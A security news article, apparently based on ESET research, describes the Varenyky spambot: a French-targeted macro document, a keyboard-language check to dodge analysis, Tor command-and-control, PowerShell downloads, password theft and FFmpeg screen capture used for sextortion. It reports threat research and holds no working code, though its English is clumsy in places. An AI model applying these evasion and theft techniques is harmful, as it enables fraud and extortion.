Varenyky spambot Trojan virus in the wild used to executing spam emails

French users are target of malicious Varenyky that records visiting adult sites

ESET researchers have observed a new malware strain named –Varenyky. The malware sends out various spam related to corrupt smartphones promotion and also distribute sextortion scam emails. As per the experts, the features of the malware is constantly being changed and improved.

The said researchers’ team has found a very interesting thing about the virus is that it can record users’ screens as soon as they enter a pornographic website:

“This spambot is interesting because it can steal passwords, spy on its victims’ screen using FFmpeg when they watch pornographic content online, and communication to the C&C server is done through Tor, while spam is sent as regular internet traffic.”

The scam email campaign

ESET are not sure about how the infection initially took place. The anticipation is that phishing financial emails were used for the distribution the Trojan virus at the beginning and soon found a sample of spam email that carried the payload initially. The payload might to be written in French and included a .doc attachment. The attachment appears to be a certain amount of euros. Victims are urged to open it. Once done, the document states verify that you are human. In reality, it asked users to enable commands which consequently allow infecting the machine with the Varenyky Trojan virus.

Malware targets French users

The malicious document, mentioned about it in previous section, has two functions: Firstly is to deliver payload and other one is to check whether the keyboard of the victim is set to the French language. To check this, the Spambot relies on the following functions:

Application.LanguageSettings,LanguageID()

This allows the malware to exclude other French speaking countries like Canada and Belgium so as to avoid automatic sample analyzers and prevent detection from malware analysts.

Malicious Varenyky!

Upon getting inside, the Varenyky performs numerous changes on the System to gain persistence and start sending spam. It connects the command and control server to take commands from the attackers. They execute from Tor address, could execute powershell command to download and install other malicious malware and uninstall the payload. Later on, the powershell commands are removed and Norsoft’s WebBrowserPassView and Mail PassView tools are employed to steal emails and passwords and sent to the attackers. The latest version is using FFmpeg that records the screen as soon as the word sexe is used in the title on the browser Window. The scammers use such details to design sextortion type emails.